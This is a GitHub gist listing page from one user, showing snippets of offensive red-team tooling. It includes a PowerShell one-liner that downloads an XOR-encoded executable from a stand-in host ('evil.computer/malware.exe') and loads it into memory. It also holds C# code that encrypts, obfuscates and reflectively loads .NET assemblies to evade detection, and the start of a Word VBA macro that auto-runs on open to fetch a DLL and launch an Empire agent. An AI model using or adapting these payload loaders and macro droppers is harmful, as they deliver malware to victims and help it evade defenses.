Skip to content

Instantly share code, notes, and snippets.

Vincent Van Mieghem vivami

Block or report user

Report or block vivami

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@vivami
vivami / LoadAndInvoke.cs
Last active Apr 18, 2019
Load Assembly and dynamically create an instance and invoke Main method
View LoadAndInvoke.cs
public static string srcTemplate = @"using System;
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
namespace Loader {
public static class Loader {
private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
@vivami
vivami / compile.cs
Created Aug 31, 2018
Compile C# src at runtime.
View compile.cs
compile(srcFinal, filename + "_obfuscated.exe");
static void compile(String source, String outfile) {
var provider_options = new Dictionary<string, string>
{
{"CompilerVersion","v3.5"}
};
var provider = new Microsoft.CSharp.CSharpCodeProvider(provider_options);
var compiler_params = new System.CodeDom.Compiler.CompilerParameters();
@vivami
vivami / encrypt.cs
Last active Aug 31, 2018
Encrypt .NET assembly to string
View encrypt.cs
String path = args[0];
key = getRandomKey();
String filename = Path.GetFileNameWithoutExtension(path).ToString();
String obfuscatedBin = obfuscateBinary(path);
private String obfuscateBinary(String file) {
byte[] assemblyBytes = fileToByteArray(@file);
byte[] encryptedAssembly = encrypt(assemblyBytes, key);
return System.Convert.ToBase64String(encryptedAssembly);
}
@vivami
vivami / load-net.ps1
Created Aug 31, 2018
Load remote .NET assembly with PowerShell
View load-net.ps1
$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
$k="XOR\_KEY";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://evil.computer/malware.exe")))|%{$_-bxor$k[$i++%$k.length]}
[System.Reflection.Assembly]::Load($b) | Out-Null
$parameters=@("arg1", "arg2")
[namespace.Class]::Main($parameters)
@vivami
vivami / prep_kali.sh
Last active Dec 18, 2017
Install additional package for kali
View prep_kali.sh
# update kali
apt update && apt upgrade -y
#install java8 for cobalt strike
cd /opt
echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee /etc/apt/sources.list.d/webupd8team-java.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee -a /etc/apt/sources.list.d/webupd8team-java.list
apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys eea14886
apt-get -y update
echo oracle-java8-installer shared/accepted-oracle-license-v1-1 select true | sudo /usr/bin/debconf-set-selections
@vivami
vivami / Empire_via_rundll-powershdll.vba
Last active Jun 10, 2019
VBA macro executing Empire Agent using PowerShdll via rundll
View Empire_via_rundll-powershdll.vba
Sub AutoOpen()
Debugging
End Sub
Sub Document_Open()
Debugging
End Sub
Public Function Debugging() As Variant
DownloadDLL
View keybase.md

Keybase proof

I hereby claim:

  • I am vivami on github.
  • I am vanmieghem (https://keybase.io/vanmieghem) on keybase.
  • I have a public key whose fingerprint is D90D C025 6090 A35C BD62 C907 32F0 0526 6B85 75C8

To claim this, I am signing this object:

You can’t perform that action at this time.